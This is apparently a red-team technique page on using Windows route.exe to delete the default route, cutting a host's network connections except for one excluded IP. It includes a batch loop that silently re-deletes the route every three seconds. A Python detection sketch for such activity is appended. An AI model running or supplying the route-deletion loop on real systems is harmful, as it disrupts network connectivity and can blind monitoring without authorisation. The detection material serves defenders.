redttps

Route.exe to remove connections

Description

This technique involves the use of the built-in Windows command-line utility route.exe to manipulate the system's routing table, specifically to remove existing network routes, effectively cutting off or rerouting network communications.


Steps

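  1. Route.exe delete 0.0.0.0 to kill all connections
  2. Route.exe add 'exclusion IP' mask 'Your Mask' 0.0.0.0 to add an exclusion
  3. Make a loop:

     @echo off
     rem Repeat every 3 seconds so a restored default route is removed again
     :loop
     rem Delete the 0.0.0.0 route and hide the command's output and errors
     route delete 0.0.0.0 >nul 2>&1
     rem Re-add the route for the excluded IP
     route add 'exclusion IP' mask 'Your Mask' 0.0.0.0
     timeout /t 3 >nul
     goto loop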
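
Detection sketch for the steps above, added here as an example and not part of the original page: it scans process-creation command lines (for instance from Sysmon Event ID 1 or Security 4688) for repeated deletion of the 0.0.0.0 route on one host and for routes added with gateway 0.0.0.0. The event tuple layout, the host names, and the 30-second / 3-hit thresholds are assumptions, and the sample records are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed process-creation records (time, host, command line); not real telemetry.
SAMPLE_EVENTS = [
    ("2024-05-01T10:00:00", "WS-01", "route  delete 0.0.0.0"),
    ("2024-05-01T10:00:00", "WS-01", "route add 192.0.2.10 mask 255.255.255.255 0.0.0.0"),
    ("2024-05-01T10:00:03", "WS-01", r"C:\Windows\System32\ROUTE.EXE delete 0.0.0.0"),
    ("2024-05-01T10:00:06", "WS-01", "route.exe DELETE 0.0.0.0"),
    ("2024-05-01T10:00:07", "WS-02", "route print"),
    ("2024-05-01T11:30:00", "WS-03", "route delete 0.0.0.0"),
]

ROUTE_CMD = re.compile(r'^"?(?:.*\\)?route(?:\.exe)?"?\s+(.*)$', re.I)

def parse_route(cmdline):
    """Return (verb, destination, gateway) for a route.exe command line, else None."""
    m = ROUTE_CMD.match(cmdline.strip())
    if not m:
        return None
    # Drop switches such as -p or -f, then read: verb destination [mask M] [gateway]
    args = [a.lower() for a in m.group(1).split() if not a.startswith(("-", "/"))]
    if len(args) < 2 or args[0] not in ("add", "delete", "change"):
        return None
    rest = args[2:]
    if rest[:1] == ["mask"]:
        rest = rest[2:]
    return args[0], args[1], (rest[0] if rest else None)

def detect(events, window=timedelta(seconds=30), threshold=3):
    """Per host: default-route deletions, whether they repeat like a loop, on-link adds."""
    deletes, exclusions = defaultdict(list), defaultdict(set)
    for ts, host, cmdline in events:
        parsed = parse_route(cmdline)
        if not parsed:
            continue
        verb, dest, gateway = parsed
        if verb == "delete" and dest == "0.0.0.0":
            deletes[host].append(datetime.fromisoformat(ts))
        elif verb == "add" and dest != "0.0.0.0" and gateway == "0.0.0.0":
            exclusions[host].add(dest)
    findings = {}
    for host, times in deletes.items():
        times.sort()
        looped = any(times[i + threshold - 1] - times[i] <= window
                     for i in range(len(times) - threshold + 1))
        findings[host] = {"deletes": len(times), "looped": looped,
                          "exclusions": sorted(exclusions[host])}
    return findings
```

Calling detect(SAMPLE_EVENTS) marks WS-01 as looped with 192.0.2.10 as the excluded destination, while the single deletion on WS-03 is reported but not marked as a loop.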